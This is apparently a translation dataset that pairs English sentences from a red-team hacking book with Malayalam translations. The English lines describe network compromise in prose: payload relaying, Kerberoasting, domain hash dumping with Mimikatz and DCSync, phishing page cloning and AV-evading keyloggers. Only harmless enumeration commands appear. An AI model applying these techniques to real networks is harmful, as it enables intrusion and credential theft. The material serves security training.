| {"en":"Once the Relay to a victim host is achievable, we need to think about what we want to execute on our victim workstation.","translation":"ഒരു ഇരയുടെ ഹോസ്റ്റിലേക്കുള്ള റിലേ സാധ്യമാകുമ്പോൾ, നമ്മുടെ ഇരയുടെ വർക്ക് സ്റ്റേഷനിൽ എന്ത് എക്സിക്യൂട്ട് ചെയ്യണമെന്ന് നമ്മൾ ചിന്തിക്കണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"By default, MultiRelay can spawn a basic shell, but we can also automatically execute Meterpreter PowerShell payloads.","translation":"സ്വതവേ, MultiRelay-ക്ക് ഒരു അടിസ്ഥാന ഷെൽ ഉണ്ടാക്കാൻ കഴിയും, എന്നാൽ നമുക്ക് മീറ്റർപ്രറ്റർ പവർഷെൽ പേലോഡുകളും സ്വയമേവ പ്രവർത്തിപ്പിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also automatically execute Empire PowerShell payloads, our dnscat2 PowerShell payload, PowerShell Scripts to Download and Execute C2 agents, Mimikatz, or just run calc.exe for kicks.","translation":"എംപയർ പവർഷെൽ പേലോഡുകൾ, ഞങ്ങളുടെ dnscat2 പവർഷെൽ പേലോഡ്, C2 ഏജന്റുകളെ ഡൗൺലോഡ് ചെയ്യാനും എക്സിക്യൂട്ട് ചെയ്യാനുമുള്ള പവർഷെൽ സ്ക്രിപ്റ്റുകൾ, മിമികാറ്റ്സ് അല്ലെങ്കിൽ രസകരത്തിനായി calc.exe പ്രവർത്തിപ്പിക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Once we compromise a Windows system, we can use PowerShell off our victim to do Responder style attacks.","translation":"നമ്മൾ ഒരു വിൻഡോസ് സിസ്റ്റം വിട്ടുവീഴ്ച ചെയ്താൽ, പ്രതികരിക്കുന്ന രീതിയിലുള്ള ആക്രമണങ്ങൾ നടത്താൻ നമ്മുടെ ഇരയിൽ നിന്ന് പവർഷെൽ ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Both features of the original Responder can be performed through the following two tools: Inveigh and Inveigh-Relay.","translation":"തുടക്കത്തിലുള്ള റെസ്പോണ്ടറിന്റെ രണ്ട് ഫീച്ചറുകളും താഴെ പറയുന്ന രണ്ട് ടൂളുകളിലൂടെ ചെയ്യാവുന്നതാണ്: ഇൻവെയും ഇൻവെ-റിലേയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"To make things even easier, all this is already built into Empire.","translation":"കാര്യങ്ങൾ കൂടുതൽ എളുപ്പമാക്കാൻ, ഇതെല്ലാം ഇതിനകം തന്നെ എംപയറിൽ നിർമ്മിച്ചിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Without actively scanning the network yet, we need to get a list of users.","translation":"നെറ്റ്വർക്ക് ഇതുവരെ സജീവമായി സ്കാൻ ചെയ്യാതെ തന്നെ, ഞങ്ങൾക്ക് ഉപയോക്താക്കളുടെ ഒരു ലിസ്റ്റ് ആവശ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"One option is to start enumerating users against the Domain Controller.","translation":"ഒരു ഓപ്ഷൻ ഡൊമൈൻ കൺട്രോളറിനെതിരെ ഉപയോക്താക്കളെ എണ്ണാൻ തുടങ്ങുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Although this is no longer available, there are other options to bruteforce accounts.","translation":"ഇപ്പോൾ ഇത് ലഭ്യമല്ലെങ്കിലും, അക്കൗണ്ടുകൾ ബ്രൂട്ട്ഫോഴ്സ് ചെയ്യാനുള്ള മറ്റ് ഓപ്ഷനുകൾ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"One option is to abuse Kerberos.","translation":"ഒരു ഓപ്ഷൻ കെർബെറോസിനെ ദുരുപയോഗം ചെയ്യുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"If we don't have a compromised system yet, but we did gain credentials through Responder, misconfigured web app, bruteforcing, or a printer, then we can try to sweep the network.","translation":"നമ്മുടെ പക്കൽ ഇതുവരെ വിട്ടുവീഴ്ച ചെയ്ത ഒരു സിസ്റ്റം ഇല്ലെങ്കിൽ, റെസ്പോണ്ടർ, തെറ്റായി കോൺഫിഗർ ചെയ്ത വെബ് ആപ്പ്, ബ്രൂട്ട്ഫോഴ്സിംഗ് അല്ലെങ്കിൽ പ്രിന്റർ എന്നിവയിലൂടെ ക്രെഡൻഷ്യലുകൾ ലഭിച്ചിട്ടുണ്ടെങ്കിൽ, നമുക്ക് നെറ്റ്വർക്ക് സ്കാൻ ചെയ്യാൻ ശ്രമിക്കാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"A simple sweep using a tool like CrackMapExec (cme) can assist in finding that initial point of entry on the internal network.","translation":"CrackMapExec (cme) പോലുള്ള ഒരു ഉപകരണം ഉപയോഗിച്ച് ലളിതമായ സ്കാൻ, ആന്തരിക നെറ്റ്വർക്കിലെ പ്രാരംഭ പ്രവേശന പോയിന്റ് കണ്ടെത്താൻ സഹായിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"After you have gained access to a host via social engineering, drop boxes, responder, attacking printers or other attacks, what do you do next?","translation":"സോഷ്യൽ എഞ്ചിനിയറിംഗ്, ഡ്രോപ്പ് ബോക്സുകൾ, റെസ്പോണ്ടർ, പ്രിന്ററുകളെ ആക്രമിക്കുക അല്ലെങ്കിൽ മറ്റ് ആക്രമണങ്ങൾ എന്നിവ വഴി നിങ്ങൾ ഒരു ഹോസ്റ്റിലേക്ക് പ്രവേശനം നേടിയ ശേഷം, നിങ്ങൾ അടുത്തതായി എന്താണ് ചെയ്യുന്നത്?","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"That is always the million dollar question.","translation":"അതാണ് എപ്പോഴും ഒരു ദശലക്ഷം ഡോളറിന്റെ ചോദ്യം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We may initially run commands similar to \"netstat -ano\" to find the locations of our IP ranges of the victim's servers, domains, and user.","translation":"ഇരയുടെ സെർവറുകൾ, ഡൊമെയ്നുകൾ, ഉപയോക്താവ് എന്നിവയുടെ IP ശ്രേണിയുടെ സ്ഥാനങ്ങൾ കണ്ടെത്താൻ, \"netstat -ano\" പോലുള്ള കമാൻഡുകൾ ഞങ്ങൾ ആദ്യമായി പ്രവർത്തിപ്പിച്ചേക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also run commands like \"ps\" or \"sc queryex type= service state= all | find \"_NAME\"\" to list all the running services.","translation":"പ്രവർത്തിക്കുന്ന എല്ലാ സേവനങ്ങളും ലിസ്റ്റ് ചെയ്യാൻ, \"ps\" അല്ലെങ്കിൽ \"sc queryex type= service state= all | find \"_NAME\"\" പോലുള്ള കമാൻഡുകളും പ്രവർത്തിപ്പിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Here are some other example commands we might initially run: Network information: netstat -anop | findstr LISTEN.","translation":"ആരംഭത്തിൽ നമ്മൾ പ്രവർത്തിപ്പിച്ചേക്കാവുന്ന മറ്റ് ചില കമാൻഡുകൾ ഇതാ: നെറ്റ്വർക്ക് വിവരങ്ങൾ: netstat -anop | findstr LISTEN.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's be real here, no one has time to remember all of these commands, but we are in luck!","translation":"ഇവിടെ യാഥാർത്ഥ്യബോധമുണ്ടാകാം, ഈ കമാൻഡുകളെല്ലാം ഓർക്കാൻ ആർക്കും സമയമില്ല, പക്ഷേ നമ്മൾ ഭാഗ്യവാന്മാരാണ്!","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"I believe, based on the RTFM book (great resource), leostat created a quick Python script that has a ton of these handy commands easily searchable in a tool called rtfm.py.","translation":"RTFM പുസ്തകത്തെ (മികച്ച resource) അടിസ്ഥാനമാക്കി, leostat, rtfm.py എന്ന ടൂളിൽ എളുപ്പത്തിൽ തിരയാൻ കഴിയുന്ന നിരവധി കമാൻഡുകളുള്ള ഒരു Python സ്ക്രിപ്റ്റ് ഉണ്ടാക്കിയെന്ന് ഞാൻ വിശ്വസിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"This is a great quick resource during any campaign.","translation":"ഏത് കാമ്പയിനിന്റെയും സമയത്ത് ഇത് ഒരു മികച്ച resource ആണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The vulnerability lies in the fact that when a service ticket is requested from the Domain Controller, that ticket is encrypted with the associated service user’s NTLM hash.","translation":"ഒരു സേവന ടിക്കറ്റ് ഡൊമെയ്ൻ കൺട്രോളറിൽ നിന്ന് ആവശ്യപ്പെടുമ്പോൾ, ആ ടിക്കറ്റ് എൻക്രിപ്റ്റ് ചെയ്യുന്നത് അനുബന്ധ സേവന ഉപയോക്താവിൻ്റെ NTLM ഹാഷ് ഉപയോഗിച്ചാണ് എന്ന വസ്തുതയിലാണ് ഈ ദൗർബല്യം നിലനിൽക്കുന്നത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Since any ticket can be requested by any user, this means that, if we can guess the password to the associated service user’s NTLM hash (that encrypted the ticket), then we now know the password to the actual service account.","translation":"ഏത് ഉപയോക്താവിനും ഏതൊരു ടിക്കറ്റും ആവശ്യപ്പെടാൻ കഴിയുന്നതിനാൽ, അനുബന്ധ സേവന ഉപയോക്താവിൻ്റെ NTLM ഹാഷിൻ്റെ പാസ്വേർഡ് (ടിക്കറ്റ് എൻക്രിപ്റ്റ് ചെയ്തത്) നമുക്ക് ഊഹിക്കാൻ കഴിയുമെങ്കിൽ, യഥാർത്ഥ സേവന അക്കൗണ്ടിൻ്റെ പാസ്വേർഡ് ഇപ്പോൾ അറിയാം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Similar to what we did before, we can list all the SPN services.","translation":"മുമ്പ് ചെയ്തതുപോലെ, നമുക്ക് എല്ലാ SPN സേവനങ്ങളും ലിസ്റ്റ് ചെയ്യാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"These are the service accounts for which we are going to pull all the Kerberos tickets.","translation":"Kerberos ടിക്കറ്റുകളെല്ലാം എടുക്കാൻ പോകുന്ന സേവന അക്കൗണ്ടുകളാണ് ഇവ.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can either target a single user SPN or pull all the user Kerberos tickets into our user's memory.","translation":"ഒരൊറ്റ ഉപയോക്തൃ SPN-നെ ലക്ഷ്യമിടാം അല്ലെങ്കിൽ എല്ലാ ഉപയോക്തൃ കെർബറോസ് ടിക്കറ്റുകളും നമ്മുടെ ഉപയോക്താവിൻ്റെ മെമ്മറിയിലേക്ക് വലിച്ചെടുക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"If successful, we have imported either one or many different Kerberos tickets into our victim computer's memory.","translation":"വിജയിച്ചാൽ, ഒന്നോ അതിലധികമോ വ്യത്യസ്തമായ കെർബറോസ് ടിക്കറ്റുകൾ നമ്മുടെ ഇരയുടെ കമ്പ്യൂട്ടറിൻ്റെ മെമ്മറിയിലേക്ക് ഇറക്കുമതി ചെയ്തിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We now need a way to extract the tickets.","translation":"ഇപ്പോൾ ടിക്കറ്റുകൾ എക്സ്ട്രാക്റ്റ് ചെയ്യാനുള്ള വഴി കണ്ടെത്തണം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"To do this, we can use good ol' Mimikatz Kerberos Export.","translation":"ഇത് ചെയ്യുന്നതിന്, നമുക്ക് പഴയ Mimikatz Kerberos Export ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Remember that the tickets are encrypted with the service account's NTLM hash.","translation":"ടിക്കറ്റുകൾ സേവന അക്കൗണ്ടിൻ്റെ NTLM ഹാഷ് ഉപയോഗിച്ച് എൻക്രിപ്റ്റ് ചെയ്തിരിക്കുന്നു എന്ന് ഓർക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"So, if we can guess that NTLM hash, we can read the ticket, and now know the service account’s password as well.","translation":"അതിനാൽ, നമുക്ക് ആ NTLM ഹാഷ് ഊഹിക്കാൻ കഴിയുമെങ്കിൽ, ടിക്കറ്റ് വായിക്കാനും സേവന അക്കൗണ്ടിൻ്റെ പാസ്വേഡ് അറിയാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The easiest way to crack accounts is using a tool called tgsrepcrack.","translation":"അക്കൗണ്ടുകൾ ക്രാക്ക് ചെയ്യാനുള്ള എളുപ്പവഴി tgsrepcrack എന്ന് പേരുള്ള ഒരു ഉപകരണം ഉപയോഗിക്കുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Using Kerberoast to crack tickets.","translation":"ടിക്കറ്റുകൾ ക്രാക്ക് ചെയ്യാൻ Kerberoast ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Of course, there is a PowerShell module in Empire that does all the hard work for us.","translation":"തീർച്ചയായും, നമുക്ക് വേണ്ടി എല്ലാ കഠിനാധ്വാനവും ചെയ്യുന്ന ഒരു PowerShell മൊഡ്യൂൾ Empire-ൽ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Dumping the Domain Controller Hashes","translation":"ഡൊമെയ്ൻ കൺട്രോളർ ഹാഷുകൾ ഡംപ് ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Once we have obtained Domain Administrative access, the old way to pull all the hashes from the DC was to run commands on the domain controller and use Shadow Volume or Raw copy techniques to pull off the Ntds.dit file.","translation":"ഡൊമെയ്ൻ അഡ്മിനിസ്ട്രേറ്റീവ് ആക്സസ് ലഭിച്ചുകഴിഞ്ഞാൽ, DC-യിൽ നിന്നുള്ള എല്ലാ ഹാഷുകളും എടുക്കാനുള്ള പഴയരീതി, ഡൊമെയ്ൻ കൺട്രോളറിൽ കമാൻഡുകൾ പ്രവർത്തിപ്പിക്കുകയും Ntds.dit ഫയൽ എടുക്കാൻ ഷാഡോ വോളിയം അല്ലെങ്കിൽ റോ കോപ്പി ടെക്നിക്കുകൾ ഉപയോഗിക്കുകയും ചെയ്യുക എന്നതായിരുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Since we do have access to the file system and can run commands on the domain controller, as an attacker, we want to grab all the Domain hashes stored in the Ntds.dit file.","translation":"ഞങ്ങൾക്ക് ഫയൽ സിസ്റ്റത്തിലേക്ക് പ്രവേശനമുള്ളതിനാലും, ഡൊമെയ്ൻ കൺട്രോളറിൽ കമാൻഡുകൾ പ്രവർത്തിപ്പിക്കാൻ കഴിയുന്നതിനാലും, ഒരു അക്രമിയെന്ന നിലയിൽ, Ntds.dit ഫയലിൽ സംഭരിച്ചിട്ടുള്ള എല്ലാ ഡൊമെയ്ൻ ഹാഷുകളും എടുക്കാൻ ഞങ്ങൾ ആഗ്രഹിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Luckily for us, we can take advantage of a Windows feature called Volume Shadow Copy Service (VSS), which will create a snapshot copy of the volume.","translation":"ഭാഗ്യവശാൽ, വോളിയത്തിൻ്റെ ഒരു സ്നാപ്ഷോട്ട് പകർപ്പ് ഉണ്ടാക്കുന്ന വോളിയം ഷാഡോ കോപ്പി സർവീസ് (VSS) എന്ന Windows ഫീച്ചർ നമുക്ക് പ്രയോജനപ്പെടുത്താം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can then read the Ntds.dit file from that copy and pull it off the machine.","translation":"തുടർന്ന്, ആ കോപ്പിയിൽ നിന്ന് Ntds.dit ഫയൽ വായിക്കാനും അത് മെഷീനിൽ നിന്ന് എടുക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"NinjaCopy is another tool that, once on the Domain Controller, can be used to grab the Ntds.dit file.","translation":"ഡൊമെയ്ൻ കൺട്രോളറിൽ എത്തിക്കഴിഞ്ഞാൽ Ntds.dit ഫയൽ എടുക്കാൻ ഉപയോഗിക്കാവുന്ന മറ്റൊരു ഉപകരണമാണ് NinjaCopy.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"More recently, DCSync, written by Benjamin Delpy and Vincent Le Toux, was introduced and changed the game on dumping hashes from Domain Controllers.","translation":"ഏറ്റവും ഒടുവിൽ, ബെഞ്ചമിൻ ഡെൽപി, വിൻസെൻ്റ് ലെ ടോക്സ് എന്നിവർ ചേർന്ന് എഴുതിയ DCSync അവതരിപ്പിക്കുകയും ഡൊമെയ്ൻ കൺട്രോളറുകളിൽ നിന്ന് ഹാഷുകൾ ഡംപ് ചെയ്യുന്ന രീതി മാറ്റിയെഴുതുകയും ചെയ്തു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"We could reset the root DB password, but that might end up breaking some of the other applications.","translation":"root DB പാസ്വേഡ് റീസെറ്റ് ചെയ്യാൻ നമുക്ക് കഴിയും, പക്ഷേ അത് മറ്റ് ആപ്ലിക്കേഷനുകൾ തകരാറിലാക്കാൻ സാധ്യതയുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Instead, we search for the different databases located under /var/lib/mysql and come across a cyberspacekittens database.","translation":"/var/lib/mysql-ൽ സ്ഥിതി ചെയ്യുന്ന വ്യത്യസ്ത ഡാറ്റാബേസുകൾക്കായി ഞങ്ങൾ തിരയുന്നു, കൂടാതെ ഒരു സൈബർസ്പേസ്കിറ്റൻസ് ഡാറ്റാബേസ് കണ്ടെത്തുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Here, we find the secrets.ibd file that holds all the data for the secrets table.","translation":"രഹസ്യ പട്ടികയിലെ എല്ലാ ഡാറ്റയും അടങ്ങുന്ന secrets.ibd ഫയൽ ഇവിടെ കാണാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As we read through the data, we realize that it might be encrypted...","translation":"ഡാറ്റ വായിക്കുമ്പോൾ, അത് എൻക്രിപ്റ്റ് ചെയ്തതായിരിക്കാം എന്ന് ഞങ്ങൾ മനസ്സിലാക്കുന്നു...","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Congrats!!! You have successfully compromised the Cyber Space Kittens network!","translation":"അഭിനന്ദനങ്ങൾ!!! നിങ്ങൾ സൈബർ സ്പേസ് കിറ്റൻസ് നെറ്റ്വർക്കിനെ വിജയകരമായി തകർത്തു!","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Don't stop here... There are many things you can do with these boxes; we have only touched the surface.","translation":"ഇവിടെ നിർത്തരുത്... ഈ ബോക്സുകൾ ഉപയോഗിച്ച് നിങ്ങൾക്ക് ചെയ്യാൻ കഴിയുന്ന നിരവധി കാര്യങ്ങളുണ്ട്; നമ്മൾ ഉപരിതലത്തിൽ മാത്രമേ സ്പർശിച്ചിട്ടുള്ളൂ.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Feel free to play around on these systems, find more sensitive files, figure out other ways to privilege escalate, and more.","translation":"ഈ സിസ്റ്റങ്ങളിൽ പരീക്ഷണം നടത്താൻ മടിക്കരുത്, കൂടുതൽ സെൻസിറ്റീവ് ഫയലുകൾ കണ്ടെത്തുക, പ്രിവിലേജ് എസ്കലേഷന്റെ മറ്റ് വഴികൾ കണ്ടെത്തുക, കൂടാതെ മറ്റു പലതും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we went through Compromising the Network.","translation":"ഈ അധ്യായത്തിൽ, ഞങ്ങൾ നെറ്റ്വർക്ക് കംപ്രമൈസിംഗിലൂടെ കടന്നുപോയി.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We started either on the network with no credentials or social engineered our way to our first victim box.","translation":"ഒന്നുകിൽ ക്രെഡൻഷ്യലുകളില്ലാതെ ഞങ്ങൾ നെറ്റ്വർക്കിൽ ആരംഭിച്ചു അല്ലെങ്കിൽ സോഷ്യൽ എഞ്ചിനിയറിംഗ് വഴി ഞങ്ങളുടെ ആദ്യ ഇരയുടെ ബോക്സിലേക്ക് എത്തി.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As Red Teamers, we love social engineering (SE) attacks.","translation":"റെഡ് ടീമർമാരായ ഞങ്ങൾ സോഷ്യൽ എഞ്ചിനിയറിംഗ് (SE) ആക്രമണങ്ങളെ സ്നേഹിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Just set up a couple of fake domains, servers, craft some emails, drop some USB sticks, and call it a day.","translation":"ചില വ്യാജ ഡൊമെയ്നുകളും സെർവറുകളും സ്ഥാപിക്കുക, ചില ഇമെയിലുകൾ ഉണ്ടാക്കുക, ചില USB സ്റ്റിക്കുകൾ ഇടുക, ഒരു ദിവസം പൂർത്തിയാക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In terms of metrics, we capture the obvious things like the number of emails sent, number of users who clicked on the link, and number of users that type in their password.","translation":"മെട്രിക്സിന്റെ കാര്യത്തിൽ, അയച്ച ഇമെയിലുകളുടെ എണ്ണം, ലിങ്കിൽ ക്ലിക്ക് ചെയ്ത ഉപയോക്താക്കളുടെ എണ്ണം, പാസ്വേഡ് ടൈപ്പ് ചെയ്ത ഉപയോക്താക്കളുടെ എണ്ണം തുടങ്ങിയ വ്യക്തമായ കാര്യങ്ങൾ ഞങ്ങൾ ശേഖരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"These types of attacks can help a company increase internal awareness by teaching their employees how to spot evil and report them to the proper teams.","translation":"ഇത്തരം ആക്രമണങ്ങൾ ജീവനക്കാരെ തിന്മ തിരിച്ചറിയാനും ഉചിതമായ ടീമുകളെ അറിയിക്കാനും പഠിപ്പിക്കുന്നതിലൂടെ ഒരു കമ്പനിക്ക് ആന്തരിക അവബോധം വർദ്ധിപ്പിക്കാൻ സഹായിക്കും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"We talked a lot about this in THP2.","translation":"THP2-ൽ ഇതിനെക്കുറിച്ച് ഞങ്ങൾ വളരെയധികം സംസാരിച്ചു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This is still one of the most successful ways to get that initial credential or drop malware.","translation":"ആരംഭത്തിലുള്ള ക്രെഡൻഷ്യൽ നേടാനും അല്ലെങ്കിൽ മാൽവെയർ വിതരണം ചെയ്യാനുമുള്ള ഏറ്റവും വിജയകരമായ മാർഗ്ഗങ്ങളിൽ ഒന്നാണിത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"When the victims go to the fake site and type in their password, we would collect that data and redirect them to the company's valid email server (mail.cyberspacekittens.com).","translation":"ഇരകൾ വ്യാജ സൈറ്റിൽ പോയി അവരുടെ പാസ്വേഡ് ടൈപ്പ് ചെയ്യുമ്പോൾ, ഞങ്ങൾ ആ ഡാറ്റ ശേഖരിക്കുകയും അവരെ കമ്പനിയുടെ സാധുവായ ഇമെയിൽ സെർവറിലേക്ക് (mail.cyberspacekittens.com) റീഡയറക്ട് ചെയ്യുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"One of the best tools to quickly clone web application authentication pages is the Social Engineering Toolkit (SET) by TrustedSec.","translation":"വെബ് ആപ്ലിക്കേഷൻ പ്രാമാണീകരണ പേജുകൾ വേഗത്തിൽ ക്ലോൺ ചെയ്യുന്നതിനുള്ള ഏറ്റവും മികച്ച ഉപകരണങ്ങളിലൊന്നാണ് ട്രസ്റ്റഡ്സെക്കിന്റെ സോഷ്യൽ എഞ്ചിനിയറിംഗ് ടൂൾകിറ്റ് (SET).","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Move your Apache server to run over SSL","translation":"നിങ്ങളുടെ Apache സെർവർ SSL-ൽ പ്രവർത്തിപ്പിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We are seeing more customers with two factor authentication (2FA).","translation":"രണ്ട് ഘടക പ്രാമാണീകരണം (2FA) ഉള്ള കൂടുതൽ ഉപഭോക്താക്കളെ ഞങ്ങൾ കാണുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Although 2FA is a big pain for Red Teams, they aren't impossible to get around.","translation":"റെഡ് ടീമുകൾക്ക് 2FA ഒരു വലിയ പ്രശ്നമാണെങ്കിലും, അത് മറികടക്കാൻ കഴിയാത്ത ഒന്നല്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In these cases, we like to drop keyloggers that continually run on a victim's system and send their keystrokes outbound.","translation":"ഈ സാഹചര്യങ്ങളിൽ, ഞങ്ങൾ കീലോഗറുകൾ സ്ഥാപിക്കാൻ ഇഷ്ടപ്പെടുന്നു, അത് ഇരയുടെ സിസ്റ്റത്തിൽ തുടർച്ചയായി പ്രവർത്തിക്കുകയും അവരുടെ കീസ്ട്രോക്കുകൾ പുറത്തേക്ക് അയയ്ക്കുകയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The reasons it is all in C are to keep the binary relatively small, have better OS control due to lower level languages, and evade AV.","translation":"ബൈനറി ചെറുതായി നിലനിർത്താനും, താഴ്ന്ന തലത്തിലുള്ള ഭാഷകൾ കാരണം മികച്ച OS നിയന്ത്രണം നേടാനും, AV ഒഴിവാക്കാനും വേണ്ടിയാണ് ഇതെല്ലാം C-യിൽ ആക്കിയിരിക്കുന്നത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's walk through a slightly more complex example.","translation":"അൽപ്പം സങ്കീർണ്ണമായ ഒരു ഉദാഹരണത്തിലൂടെ കടന്നുപോകാമ.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Install Visual Studio so that you could use the command line compiler along with Vim for code editing","translation":"കോഡ് എഡിറ്റിംഗിനായി വിം-നൊപ്പം കമാൻഡ് ലൈൻ കംപൈലർ ഉപയോഗിക്കാൻ കഴിയുന്ന തരത്തിൽ വിഷ്വൽ സ്റ്റുഡിയോ ഇൻസ്റ്റാൾ ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"MSDN is an invaluable resource that details system calls, type and struct definitions, and includes dozens of examples.","translation":"സിസ്റ്റം കോളുകൾ, തരം, ഘടന എന്നിവയുടെ നിർവചനങ്ങൾ വിശദീകരിക്കുന്നതും, നിരവധി ഉദാഹരണങ്ങൾ ഉൾക്കൊള്ളുന്നതുമായ വിലപ്പെട്ട ഒരു വിവരശേഖരം ആണ് MSDN.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"For C, there is a good book co-authored by one of the founders of C called, The C Programming Language by Kernighan and Ritchie.","translation":"C-യെക്കുറിച്ച് കെർനിഗനും, റിച്ചിയും ചേർന്ന് എഴുതിയ 'The C Programming Language' എന്ന നല്ലൊരു പുസ്തകമുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Once VS Community is installed, make sure to also install the Universal Windows Platform development and Desktop development with C++ under Tools -> Get Tools and Features.","translation":"VS കമ്മ്യൂണിറ്റി ഇൻസ്റ്റാൾ ചെയ്ത ശേഷം, ടൂൾസ് -> ഗെറ്റ് ടൂൾസ് ആൻഡ് ഫീച്ചേഴ്സ് എന്നതിലൂടെ യൂണിവേഴ്സൽ വിൻഡോസ് പ്ലാറ്റ്ഫോം വികസനവും, C++ ഉപയോഗിച്ചുള്ള ഡെസ്ക്ടോപ്പ് വികസനവും ഇൻസ്റ്റാൾ ചെയ്യാൻ ശ്രദ്ധിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"To compile the examples, open up an instance of the developer command prompt, then navigate to the folder that contains the source files.","translation":"ഉദാഹരണങ്ങൾ കംപൈൽ ചെയ്യുന്നതിന്, ഡെവലപ്പർ കമാൻഡ് പ്രോംപ്റ്റിന്റെ ഒരു ഇൻസ്റ്റൻസ് തുറന്ന്, സോഴ്സ് ഫയലുകൾ അടങ്ങിയ ഫോൾഡറിലേക്ക് നാവിഗേറ്റ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This will produce an executable with the same name as the source file.","translation":"ഇത് സോഴ്സ് ഫയലിന്റെ അതേ പേരിൽ ഒരു എക്സിക്യൂട്ടബിൾ ഉണ്ടാക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The compiler defaults to 32-bit, but this code can also be compiled in 64-bit.","translation":"കംപൈലർ 32-ബിറ്റിലേക്ക് ഡിഫോൾട്ട് ചെയ്യും, എന്നാൽ ഈ കോഡ് 64-ബിറ്റിലും കംപൈൽ ചെയ്യാവുന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
